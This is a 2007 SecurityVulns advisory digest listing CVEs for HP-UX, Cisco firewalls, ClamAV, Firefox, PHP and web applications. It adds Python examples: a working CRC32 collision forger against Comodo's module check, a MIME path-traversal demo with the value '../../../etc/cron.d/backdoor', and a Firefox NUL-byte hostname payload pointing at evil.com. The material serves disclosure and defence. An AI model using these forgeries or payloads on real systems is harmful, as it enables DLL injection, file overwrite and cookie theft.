Computer Security


HP-UX SLSd unauthorized access
Published:15.02.2007
Source:
SecurityVulns ID:7239
Type:remote
Threat Level:
6/10
Description:A crafted RPC request to the Distributed SLS daemon lets a remote attacker create or overwrite arbitrary files with attacker-supplied content, which can be leveraged to gain privileges.
Affected:HP : HP-UX 10.20
 HP : HP-UX 11.11
CVE:CVE-2007-0915 (Distributed SLS daemon (SLSd) on HP-UX B.11.11 allows remote attackers to overwrite arbitrary files and gain privileges via a crafted RPC request.)
Original document:HP, HPSBUX02191 SSRT071302 rev.1 - HP-UX Running SLSd, Remote Unauthorized Arbitrary File Creation (15.02.2007)
 IDEFENSE, iDefense Security Advisory 02.13.07: Hewlett-Packard HP-UX SLSd Arbitrary File Creation Vulnerability (15.02.2007)

PalmOS Treo smartphones protection bypass
Published:15.02.2007
Source:
SecurityVulns ID:7240
Type:local
Threat Level:
4/10
Description:The Find feature keeps working while the device is password-locked, so anyone with physical access can read memory contents through text searches or paste operations triggered by keyboard shortcuts.
Affected:VERIZON : Verizon Treo 650
 SPRINT : Sprint Treo 650
 CINGULAR : Cingular Treo 650
 CINGULAR : Cingular Treo 680
 SPRINT : Sprint Treo 700
 VERIZON : Verizon Treo 700
CVE:CVE-2007-0859 (The Find feature in Palm OS Treo smart phones operates despite the system password lock, which allows attackers with physical access to obtain sensitive information (memory contents) by doing (1) text searches or (2) paste operations after pressing certain keyboard shortcut keys.)
Original document:SYMANTEC, SYMSA-2007-002: Palm OS Treo Find Feature System Password Bypass (15.02.2007)

Cisco PIX / ASA / FWSM multiple security vulnerabilities
Published:15.02.2007
Source:
SecurityVulns ID:7242
Type:remote
Threat Level:
5/10
Description:Multiple DoS conditions (device reboot) in HTTP, SIP and TCP traffic inspection, in HTTPS and SNMP handling and in syslog generation, plus improper ACL evaluation on FWSM and privilege escalation with LOCAL authentication on PIX/ASA 7.2.2.
Affected:CISCO : PIX 6.3
 CISCO : PIX 7.0
 CISCO : FWSM 2.3
 CISCO : PIX 7.1
 CISCO : ASA 7.0
 CISCO : ASA 7.1
 CISCO : FWSM 3.1
 CISCO : PIX 7.2
 CISCO : ASA 7.2
 CISCO : ASA 6.3
CVE:CVE-2007-0968 (Unspecified vulnerability in Cisco Firewall Services Module (FWSM) before 2.3(4.7) and 3.x before 3.1(3.1) causes the access control entries (ACE) in an ACL to be improperly evaluated, which allows remote authenticated users to bypass intended certain ACL protections.)
 CVE-2007-0967 (Cisco Firewall Services Module (FWSM) 3.x before 3.1(3.1) allows remote attackers to cause a denial of service (device reboot) via malformed SNMP requests.)
 CVE-2007-0966 (Cisco Firewall Services Module (FWSM) 3.x before 3.1(3.11), when the HTTPS server is enabled, allows remote attackers to cause a denial of service (device reboot) via certain HTTPS traffic.)
 CVE-2007-0965 (Cisco FWSM 3.x before 3.1(3.2), when authentication is configured to use "aaa authentication match" or "aaa authentication include", allows remote attackers to cause a denial of service (device reboot) via a long HTTP request.)
 CVE-2007-0964 (Cisco FWSM 3.x before 3.1(3.18), when authentication is configured to use "aaa authentication match" or "aaa authentication include", allows remote attackers to cause a denial of service (device reboot) via a malformed HTTPS request.)
 CVE-2007-0963 (Unspecified vulnerability in Cisco Firewall Services Module (FWSM) 3.x before 3.1(3.3), when set to log at the "debug" level, allows remote attackers to cause a denial of service (device reboot) by sending packets that are not of a particular protocol such as TCP or UDP, which triggers the reboot during generation of Syslog message 710006.)
 CVE-2007-0962 (Cisco PIX 500 and ASA 5500 Series Security Appliances 7.0 before 7.0(4.14) and 7.1 before 7.1(2.1), and the FWSM 2.x before 2.3(4.12) and 3.x before 3.1(3.24), when "inspect http" is enabled, allows remote attackers to cause a denial of service (device reboot) via malformed HTTP traffic.)
 CVE-2007-0961 (Cisco PIX 500 and ASA 5500 Series Security Appliances 6.x before 6.3(5.115), 7.0 before 7.0(5.2), and 7.1 before 7.1(2.5), and the FWSM 3.x before 3.1(3.24), when the "inspect sip" option is enabled, allows remote attackers to cause a denial of service (device reboot) via malformed SIP packets.)
 CVE-2007-0960 (Unspecified vulnerability in Cisco PIX 500 and ASA 5500 Series Security Appliances 7.2.2, when configured to use the LOCAL authentication method, allows remote authenticated users to gain privileges via unspecified vectors.)
 CVE-2007-0959 (Cisco PIX 500 and ASA 5500 Series Security Appliances 7.2.2, when configured to inspect certain TCP-based protocols, allows remote attackers to cause a denial of service (device reboot) via malformed TCP packets.)
Original document:CISCO, Cisco Security Advisory: Multiple Vulnerabilities in Firewall Services Module (15.02.2007)
 CISCO, Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and ASA Appliances (15.02.2007)

Comodo firewall protection bypass
Published:15.02.2007
Source:
SecurityVulns ID:7243
Type:local
Threat Level:
4/10
Description:Module integrity is verified with a CRC32 checksum rather than a cryptographic hash, so a modified module (e.g. an injected DLL) can trivially be adjusted to carry the same CRC32 value as the trusted one and is accepted.
Affected:COMODO : Comodo Firewall Pro 2.4
 COMODO : Comodo Personal Firewall 2.3
CVE:CVE-2007-1051 (Comodo Firewall Pro (formerly Comodo Personal Firewall) 2.4.17.183 and earlier uses a weak cryptographic hashing function (CRC32) to identify trusted modules, which allows local users to bypass security protections by substituting modified modules that have the same CRC32 value.)
Original document:Matousec - Transparent security Research, [Full-disclosure] Comodo DLL injection via weak hash function exploitation Vulnerability (15.02.2007)
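Why a CRC32 check is no integrity check: CRC32 is linear over GF(2), so any modified module can be given the CRC32 of the trusted one by appending four computed bytes. The following is an added illustration of that forgery, not code from Comodo or from the matousec advisory; the "trusted" and "modified" module blobs are constructed here, and the algorithm is the standard four-byte CRC reversal applied to zlib's CRC-32.

```python
"""Forge a CRC32 collision: append four bytes to a modified blob so it
carries the CRC32 of the original.  Added example (not Comodo's or
matousec's code); sample module bytes are constructed below."""
import zlib

POLY = 0xEDB88320  # reflected CRC-32 polynomial used by zlib


def _make_tables():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    # Reversal relies on every table entry having a distinct top byte.
    rev = {t >> 24: i for i, t in enumerate(table)}
    assert len(rev) == 256
    return table, rev


TABLE, REV = _make_tables()


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF


def forge_patch(data: bytes, target_crc: int) -> bytes:
    """Return 4 bytes p such that crc32(data + p) == target_crc.

    zlib returns reg ^ 0xFFFFFFFF, where reg starts at 0xFFFFFFFF and is
    updated per byte as reg = TABLE[(reg ^ b) & 0xff] ^ (reg >> 8).
    Feeding four bytes W (little-endian) after register R gives the same
    result as feeding four zero bytes after R ^ W, so we invert four
    zero-byte steps starting from the target register and XOR with R.
    """
    reg = crc32(data) ^ 0xFFFFFFFF
    v = target_crc ^ 0xFFFFFFFF
    for _ in range(4):
        idx = REV[v >> 24]                 # low byte of the previous register
        v = ((v ^ TABLE[idx]) << 8) | idx  # undo one zero-byte update
    return (v ^ reg).to_bytes(4, "little")


def forge_collision(original: bytes, modified: bytes) -> bytes:
    """Append a 4-byte tail to `modified` so its CRC32 equals original's."""
    return modified + forge_patch(modified, crc32(original))


def collides(original: bytes, modified: bytes) -> bool:
    """True when the forged blob differs from the original yet shares its CRC32."""
    forged = forge_collision(original, modified)
    return forged != original and crc32(forged) == crc32(original)


# Constructed sample: a "trusted module" and an attacker-modified copy.
TRUSTED = b"MZ\x90\x00" + b"\x00" * 60 + b"trusted-dll-code-0.1"
MODIFIED = b"MZ\x90\x00" + b"\x00" * 60 + b"injected-dll-code..."

if __name__ == "__main__":
    forged = forge_collision(TRUSTED, MODIFIED)
    print("trusted  crc32: %08x" % crc32(TRUSTED))
    print("forged   crc32: %08x" % crc32(forged))
    print("forged tail   :", forged[-4:].hex())
```

The four appended bytes can be placed anywhere a loader ignores (overlay, padding, an unused section); for a fix, the trusted-module list has to be keyed by a cryptographic digest (SHA-256 or a signature check), not by any CRC.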

Lizardtech DjVu plugin multiple security vulnerabilities
Published:15.02.2007
Source:
SecurityVulns ID:7244
Type:client
Threat Level:
5/10
Description:Multiple buffer overflows in different methods.
Affected:LIZARDTECH : DjVu Browser Plug-in 6.1
CVE:CVE-2007-0324 (Multiple buffer overflows in the LizardTech DjVu Browser Plug-in before 6.1.1 allow remote attackers to execute arbitrary code via unspecified vectors.)
Original document:Brett Moore, [Full-disclosure] Lizardtech DjVu Browser Plug-in - Multiple Vulnerabilities (15.02.2007)

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published:15.02.2007
Source:
SecurityVulns ID:7245
Type:remote
Threat Level:
5/10
Description:PHP file inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.
Affected:DESKPRO : DeskPRO 1.1
 ADVANCEDPOLL : Advanced Poll 2.0
 DRUPAL : Drupal 4.7
 PHPCC : phpCC 4.2
 DRUPAL : Drupal 5.1
 NABOCORP : nabopoll 1.1
 MOHA : MOHA Chat 0.1
 ATMAIL : @mail 0.61
 HARPIA : Harpia CMS 1.0
 SCART : SCart 2.0
 APACHESTATS : Apache Stats 0.0
 TAGIT : TagIt! Tagboard 2.1
 ZEBRAFEEDS : ZebraFeeds 1.0
 ANSATHEUS : AT Contenator 1.0
 XARANCMS : Xaran CMS 2.0
 POLLMENTOR : PollMentor 2.0
CVE:CVE-2007-1021 (SQL injection vulnerability in inc_listnews.asp in CodeAvalanche News 1.x allows remote attackers to execute arbitrary SQL commands via the CAT_ID parameter.)
 CVE-2007-1016 (SQL injection vulnerability in Aktueldownload Haber script allows remote attackers to execute arbitrary SQL commands via certain vectors related to the HaberDetay.asp and rss.asp components, and the id and kid parameters. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. NOTE: the combination of the HaberDetay.asp component and the id parameter is already covered by another February 2007 CVE candidate.)
 CVE-2007-1015 (SQL injection vulnerability in HaberDetay.asp in Aktueldownload Haber script allows remote attackers to execute arbitrary SQL commands via the id parameter.)
 CVE-2007-1012 (Cross-site scripting (XSS) vulnerability in faq.php in DeskPRO 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the article parameter.)
 CVE-2007-1010 (Multiple PHP remote file inclusion vulnerabilities in ZebraFeeds 1.0, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the zf_path parameter to (1) aggregator.php and (2) controller.php in newsfeeds/includes/.)
 CVE-2007-0985 (SQL injection vulnerability in nickpage.php in phpCC 4.2 beta and earlier allows remote attackers to execute arbitrary SQL commands via the npid parameter in a sign_gb action.)
 CVE-2007-0984 (SQL injection vulnerability in admin_poll.asp in PollMentor 2.0 allows remote attackers to execute arbitrary SQL commands via the id parameter to pollmentorres.asp.)
 CVE-2007-0983 (PHP remote file inclusion vulnerability in _admin/nav.php in AT Contenator 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the Root_To_Script parameter.)
 CVE-2007-0954 (MOHA Chat 0.1b7 and earlier does not require authentication for use of the plug in API, which has unknown impact and attack vectors.)
 CVE-2007-0953 (Cross-site scripting (XSS) vulnerability in search.pl in @Mail 4.61 and earlier allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.)
 CVE-2007-0952 (Multiple cross-site scripting (XSS) vulnerabilities in Scriptsez.net Virtual Calendar allow remote attackers to inject arbitrary web script or HTML via the (1) t and (2) yr parameters, and the (3) sho parameter when the m parameter is outside the intended range.)
 CVE-2007-0930 (Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.)
 CVE-2007-0928 (Virtual Calendar stores sensitive information under the web root with insufficient access control, which allows remote attackers to download an encoded password via a direct request for pwd.txt.)
 CVE-2007-0900 (Multiple PHP remote file inclusion vulnerabilities in TagIt! Tagboard 2.1.B Build 2 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) configpath parameter to (a) tagviewer.php, (b) tag_process.php, and (c) CONFIG/errmsg.inc.php; and (d) addTagmin.php, (e) ban_watch.php, (f) delTagmin.php, (g) delTag.php, (h) editTagmin.php, (i) editTag.php, (j) manageTagmins.php, and (k) verify.php in tagmin/; the (2) adminpath parameter to (l) tagviewer.php, (m) tag_process.php, and (n) tagmin/index.php; and the (3) admin parameter to (o) readconf.php, (p) updateconf.php, (q) updatefilter.php, and (r) wordfilter.php in tagmin/; different vectors than CVE-2006-5249.)
 CVE-2006-7024 (Multiple PHP remote file inclusion vulnerabilities in Harpia CMS 1.0.5 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) func_prog parameter to (a) preload.php and (b) index.php; (2) header_prog parameter to (c) missing.php and (d) email.php, (e) files.php, (f) headlines.php, (g) search.php, (h) topics.php, and (i) users.php in _mods/; (3) theme_root parameter to (j) footer.php, (k) header.php, (l) pfooter.php, and (m) pheader.php in _inc; (4) mod_root parameter to _inc/header.php; and the (5) mod_dir and (6) php_ext parameters to (n) _inc/web_statsConfig.php.)
 CVE-2006-7012 (scart.cgi in SCart 2.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the page parameter of a show_text action.)
 CVE-2006-7005 (SQL injection vulnerability in item.php in PSY Auction allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.)
 CVE-2006-7004 (Cross-site scripting (XSS) vulnerability in email_request.php in PSY Auction allows remote attackers to inject arbitrary web script or HTML via the user_id parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.)
 CVE-2006-7000 (Headstart Solutions DeskPRO allows remote attackers to obtain the full path via direct requests to (1) email/mail.php, (2) includes/init.php, (3) certain files in includes/cron/, and (4) jpgraph.php, (5) jpgraph_bar.php, (6) jpgraph_pie.php, and (7) jpgraph_pie3d.php in includes/graph/, which leaks the path in error messages.)
 CVE-2006-6999 (attachment.php in Headstart Solutions DeskPRO allows remote attackers to read all uploaded files by providing the file number in a modified id parameter.)
 CVE-2006-6998 (install/loader_help.php in Headstart Solutions DeskPRO allows remote attackers to obtain configuration information via a q=phpinfo QUERY_STRING, which calls the phpinfo function.)
 CVE-2006-5249 (PHP remote file inclusion vulnerability in tagmin/delTagUser.php in TagIt! Tagboard 2.1.B Build 2 (tagit2b) allows remote attackers to execute arbitrary PHP code via a URL in the configpath parameter.)
Original document:x0r0n_(at)_hotmail.com, Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability (15.02.2007)
 beks, CodeAvalanche News SQL Injection (15.02.2007)
 [email protected]_King, nabopoll 1.2 Remote Unprotected Admin Section Vulnerability (15.02.2007)
 [email protected]_King, nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability (15.02.2007)
 ThE [email protected], ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities (15.02.2007)
 bl4ck_(at)_bsdmail.org, XSS in [Calendar Express 2 ] (15.02.2007)
 bl4ck_(at)_bsdmail.org, XSS in [deskpro.com v1.1.0 ] (15.02.2007)
Files:Drupal < 5.1 Remote Command Execution Exploit
 Drupal < 4.7.6 Remote Command Execution Exploit
 phpCC Beta <= 4.2 (nickpage.php npid) Remote SQL Injection Exploit
 Xaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit
 AT Contenator <= v1.0 (Root_To_Script) Remote File Include Exploit
 Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE

iTinySoft Studio Total Video Player buffer overflow
Published:15.02.2007
Source:
SecurityVulns ID:7246
Type:client
Threat Level:
5/10
Description:Stack-based buffer overflow when parsing .m3u playlist files that contain an overlong file name.
Affected:ITINYSOFT : Total Video Player 1.03
CVE:CVE-2007-0949 (Stack-based buffer overflow in iTinySoft Studio Total Video Player 1.03, and possibly earlier, allows remote attackers to execute arbitrary code via a M3U playlist file that contains a long file name. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.)

Sun Solaris TCP packets processing race conditions
Published:15.02.2007
Source:
SecurityVulns ID:7247
Type:remote
Threat Level:
6/10
Description:A race condition in the TCP subsystem lets a remote attacker panic the system (DoS).
Affected:ORACLE : Solaris 10
CVE:CVE-2007-0914 (Race condition in the TCP subsystem for Solaris 10 allows remote attackers to cause a denial of service (system panic) via unknown vectors.)

Multiple PHP vulnerabilities
Published:15.02.2007
Source:
SecurityVulns ID:7248
Type:local
Threat Level:
6/10
Description:Multiple buffer overflows, DoS conditions, information leaks, etc.
Affected:PHP : PHP 5.2
CVE:CVE-2007-0910 (Unspecified vulnerability in PHP before 5.2.1 allows attackers to "clobber" certain super-global variables via unspecified vectors.)
 CVE-2007-0909 (Multiple format string vulnerabilities in PHP before 5.2.1 might allow attackers to execute arbitrary code via format string specifiers to (1) all of the *print functions on 64-bit systems, and (2) the odbc_result_all function.)
 CVE-2007-0908 (The WDDX deserializer in the wddx extension in PHP 5 before 5.2.1 and PHP 4 before 4.4.5 does not properly initialize the key_length variable for a numerical key, which allows context-dependent attackers to read stack memory via a wddxPacket element that contains a variable with a string name before a numerical variable.)
 CVE-2007-0907 (Buffer underflow in PHP before 5.2.1 allows attackers to cause a denial of service via unspecified vectors involving the sapi_header_op function.)
 CVE-2007-0906 (Multiple buffer overflows in PHP before 5.2.1 allow attackers to cause a denial of service and possibly execute arbitrary code via unspecified vectors in the (1) session, (2) zip, (3) imap, and (4) sqlite extensions; (5) stream filters; and the (6) str_replace, (7) mail, (8) ibase_delete_user, (9) ibase_add_user, and (10) ibase_modify_user functions. NOTE: vector 6 might actually be an integer overflow (CVE-2007-1885). NOTE: as of 20070411, vector (3) might involve the imap_mail_compose function (CVE-2007-1825).)

ejabberd roster ODBC module vulnerability
Published:15.02.2007
Source:
SecurityVulns ID:7249
Type:remote
Threat Level:
5/10
CVE:CVE-2007-0903 (Unspecified vulnerability in the mod_roster_odbc module in ejabberd before 1.1.3 has unknown impact and attack vectors.)

ClamAV antivirus directory traversal
Published:15.02.2007
Source:
SecurityVulns ID:7250
Type:remote
Threat Level:
8/10
Description:The id parameter of a multi-part MIME message is used to build a local file name without rejecting ../ sequences, so a remote attacker can make clamd overwrite arbitrary files. In addition, CAB archives with a zero-length cabinet header record leak a file descriptor per scan, leading to descriptor exhaustion and failed scans (DoS).
Affected:CLAMAV : ClamAV 0.88
CVE:CVE-2007-0898 (Directory traversal vulnerability in clamd in Clam AntiVirus ClamAV before 0.90 allows remote attackers to overwrite arbitrary files via a .. (dot dot) in the id MIME header parameter in a multi-part message.)
 CVE-2007-0897 (Clam AntiVirus ClamAV before 0.90 does not close open file descriptors under certain conditions, which allows remote attackers to cause a denial of service (file descriptor consumption and failed scans) via CAB archives with a cabinet header record length of zero, which causes a function to return without closing a file descriptor.)
Original document:IDEFENSE, iDefense Security Advisory 02.15.07: Multiple Vendor ClamAV CAB File Denial of Service Vulnerability (15.02.2007)
 IDEFENSE, iDefense Security Advisory 02.15.07: Multiple Vendor ClamAV MIME Parsing Directory Traversal Vulnerability (15.02.2007)
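The traversal above is the generic "untrusted header value becomes a file name" mistake. The following added example, which is not ClamAV's code, parses a constructed message/partial MIME message, shows how a naive join of the attacker-controlled id parameter escapes the spool directory, and derives the on-disk name safely instead; the /var/tmp/clamav-partial spool path is a hypothetical base directory.

```python
"""Untrusted MIME 'id' parameter vs. the filesystem.  Added example,
not ClamAV's code; the message and the spool path are constructed."""
import email
import hashlib
import posixpath as pp
import re

BASE = "/var/tmp/clamav-partial"  # hypothetical spool directory

# Constructed multi-part message: the id= parameter is attacker-controlled.
SAMPLE = (
    b"From: a@example.org\r\n"
    b"Content-Type: message/partial; number=1; total=2;\r\n"
    b'  id="../../../etc/cron.d/backdoor"\r\n'
    b"\r\n"
    b"fragment 1 of 2\r\n"
)


def partial_id(raw: bytes) -> str:
    """Extract the message/partial id parameter as the MIME parser sees it."""
    msg = email.message_from_bytes(raw)
    pid = msg.get_param("id")
    if not isinstance(pid, str):
        raise ValueError("no usable id parameter")
    return pid


def naive_path(base: str, pid: str) -> str:
    """Vulnerable pattern: paste the untrusted id into a file name."""
    return pp.normpath(pp.join(base, pid))


SAFE_ID = re.compile(r"^[A-Za-z0-9._@+-]{1,200}$")


def safe_path(base: str, pid: str) -> str:
    """Hardened: the id never reaches the filesystem namespace.

    A strict whitelist rejects separators, NUL and control bytes up front,
    and the name actually used on disk is a hash of the id, so even a
    whitelisted id cannot choose or collide with an existing file name.
    """
    if not SAFE_ID.fullmatch(pid):
        raise ValueError("rejecting MIME id %r" % pid)
    digest = hashlib.sha256(pid.encode("utf-8")).hexdigest()
    return pp.join(base, digest)


def inside(base: str, path: str) -> bool:
    """Containment check: the resolved path must stay under base."""
    return pp.commonpath([base, pp.normpath(path)]) == base


if __name__ == "__main__":
    pid = partial_id(SAMPLE)
    print("id parameter :", pid)
    print("naive target :", naive_path(BASE, pid), "inside:", inside(BASE, naive_path(BASE, pid)))
    try:
        safe_path(BASE, pid)
    except ValueError as e:
        print("hardened     :", e)
```

The containment check is a last line of defence for code that must keep a caller-supplied name; a scanner that only needs a temporary file should not derive it from message content at all.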

Mozilla Firefox cross domain access
updated since 15.02.2007
Published:27.02.2007
Source:
SecurityVulns ID:7238
Type:client
Threat Level:
8/10
Description:Setting location.hostname='evil.com\x00foo.example.com' from JavaScript makes the browser send the request meant for foo.example.com to evil.com: the DNS resolver stops at the NUL byte while the same-origin and cookie checks see the full string. This yields cross-domain access (cookie theft, script execution in the target's origin) and can be used for hidden malware installation.
Affected:MOZILLA : Firefox 2.0
CVE:CVE-2007-1084 (Mozilla Firefox 2.0.0.1 and earlier does not prompt users before saving bookmarklets, which allows remote attackers to bypass the same-domain policy by tricking a user into saving a bookmarklet with a data: scheme, which is executed in the context of the last visited web page.)
 CVE-2007-1004 (Mozilla Firefox might allow remote attackers to conduct spoofing and phishing attacks by writing to an about:blank tab and overlaying the location bar.)
 CVE-2007-0981 (Mozilla based browsers, including Firefox before 1.5.0.10 and 2.x before 2.0.0.2, and SeaMonkey before 1.0.8, allow remote attackers to bypass the same origin policy, steal cookies, and conduct other attacks by writing a URI with a null byte to the hostname (location.hostname) DOM property, due to interactions with DNS resolver code.)
Original document:MOZILLA, Mozilla Foundation Security Advisory 2007-07 (27.02.2007)
 Michal Zalewski, [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability (22.02.2007)
 Michal Zalewski, Firefox: about:blank is phisher's best friend (18.02.2007)
 Michal Zalewski, Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability (15.02.2007)
 Michal Zalewski, Firefox: serious cookie stealing / same-domain bypass vulnerability (15.02.2007)
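The NUL-byte hostname bug is a string-model mismatch: to JavaScript and to the same-origin and cookie code the hostname is a length-counted string, but to the C resolver it is NUL-terminated. The following added example (not Mozilla's code) models both views of one hostname to show where the cookie ends up, and then the hostname validation that closes the gap; the hostnames and cookie domain are constructed.

```python
"""Counted string vs. C string: one hostname, two interpretations.
Added example, not Mozilla's code; hosts below are constructed."""
import re

# One DNS label: letters, digits, hyphen, no leading/trailing hyphen (RFC 1123).
LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def resolver_view(host: str) -> str:
    """What a NUL-terminated C resolver API sees: text up to the first NUL."""
    return host.split("\x00", 1)[0]


def cookie_domain_matches(host: str, cookie_domain: str) -> bool:
    """Domain suffix match as cookie code does it, on the full counted string."""
    d = cookie_domain.lstrip(".")
    return host == d or host.endswith("." + d)


def where_does_cookie_go(host: str, cookie_domain: str):
    """Host that receives a cookie scoped to cookie_domain, or None if it is not sent."""
    if not cookie_domain_matches(host, cookie_domain):
        return None
    return resolver_view(host)


def valid_hostname(host: str) -> bool:
    """Accept only plain LDH hostnames, so NUL, spaces and control bytes are
    rejected before any component can read the string differently."""
    if not host or len(host) > 253:
        return False
    return all(LABEL.fullmatch(label) for label in host.rstrip(".").split("."))


def set_hostname(host: str) -> str:
    """Hardened location.hostname setter: validate, then assign."""
    if not valid_hostname(host):
        raise ValueError("malformed hostname rejected")
    return host


if __name__ == "__main__":
    crafted = "evil.com\x00foo.example.com"
    print("cookie for .example.com goes to:", where_does_cookie_go(crafted, ".example.com"))
    print("valid hostname?", valid_hostname(crafted))
```

The same validator belongs in front of any code path that hands a hostname to a C API, such as URL parsers, proxy configuration and TLS SNI, because the mismatch is a property of the boundary, not of one browser.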

HP-UX ARPA transport DoS
updated since 15.02.2007
Published:24.01.2008
Source:
SecurityVulns ID:7241
Type:remote
Threat Level:
5/10
Affected:HP : HP-UX 11.11
 HP : HP-UX 11.23
CVE:CVE-2007-6425
 CVE-2007-1994 (Unspecified vulnerability in the Address and Routing Parameter Area (ARPA) transport functionality in HP-UX B.11.00 allows local users to cause a denial of service via unknown vectors. NOTE: due to lack of vendor details, it is not clear whether this is the same as CVE-2007-0916.)
 CVE-2007-0916 (Unspecified vulnerability in the Address and Routing Parameter Area (ARPA) transport functionality in HP-UX B.11.11 and B.11.23 allows local users to cause an unspecified denial of service via unknown vectors.)
Original document:HP, [security bulletin] HPSBUX02306 SSRT071463 rev.1 - HP-UX Running ARPA Transport, Remote Denial of Service (DoS) (24.01.2008)
 HP, [security bulletin] HPSBUX02248 SSRT071437 rev.1 - HP-UX Running ARPA Transport, Remote Denial of Service (DoS) (03.08.2007)
 HP, [security bulletin] HPSBUX02247 SSRT071432 rev.1 - HP-UX Running ARPA Transport, Local Denial of Service (DoS) (03.08.2007)
 HP, HPSBUX02205 SSRT061120 rev.1 - HP-UX Running ARPA Transport, Local Denial of Service (DoS) (13.04.2007)
 HP, [security bulletin] HPSBUX02192 SSRT061233 rev.1 - HP-UX Running ARPA Transport, Local Denial of Service (DoS) (15.02.2007)

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod